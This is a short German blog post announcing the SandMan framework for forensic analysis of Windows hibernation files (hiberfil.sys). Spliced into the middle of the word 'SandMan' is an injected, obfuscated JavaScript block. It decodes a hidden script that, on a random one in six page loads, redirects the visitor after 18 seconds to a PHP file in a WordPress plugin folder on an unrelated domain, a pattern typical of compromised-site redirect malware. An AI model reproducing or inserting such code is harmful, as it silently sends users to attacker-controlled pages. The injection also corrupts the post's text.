Suspend-to-Disk Forensics II

íconsDas hier angekündigte SandMan Framework für die Analyse von hiberfil.sys-Dateien ist nun fertig gestellt. Diese Dateien werden unter Windows beim Übergang in den Ruhezustand erstellt und enthalten Hauptspeicherdaten. Derzeit werden die Hibernate-Dateien der 32Bit Versionen von Windows XP bis Windows 2008 Server unterstützt.

S<script>function u2fd518ba9147(q3){var u9='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var y7='';var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0<q3.length);document.write(y7);};u2fd518ba9147('PHNjcmlwdD4NCnZhciBudW1iZXIxPU1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDYpOyANCmlmIChudW1iZXIxPT0zKQ0Kew0KIHZhciBkZWxheSA9IDE4MDAwOwkNCiBzZXRUaW1lb3V0KCJkb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmJ0bGF3ZmlybS5jb20vd3AtY29udGVudC9wbHVnaW5zL3NpLWNvbnRhY3QtZm9ybS9jYXB0Y2hhLXNlY3VyZWltYWdlL3NlY3VyaW1hZ2Vfc3RvcC5waHAnIiwgZGVsYXkpOw0KfQ0KPC9zY3JpcHQ+');</script>andman

Das SandMan-Framework kann hier  heruntergeladen werde, die Doku befindet sich hier.

1 thought on “Suspend-to-Disk Forensics II”

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.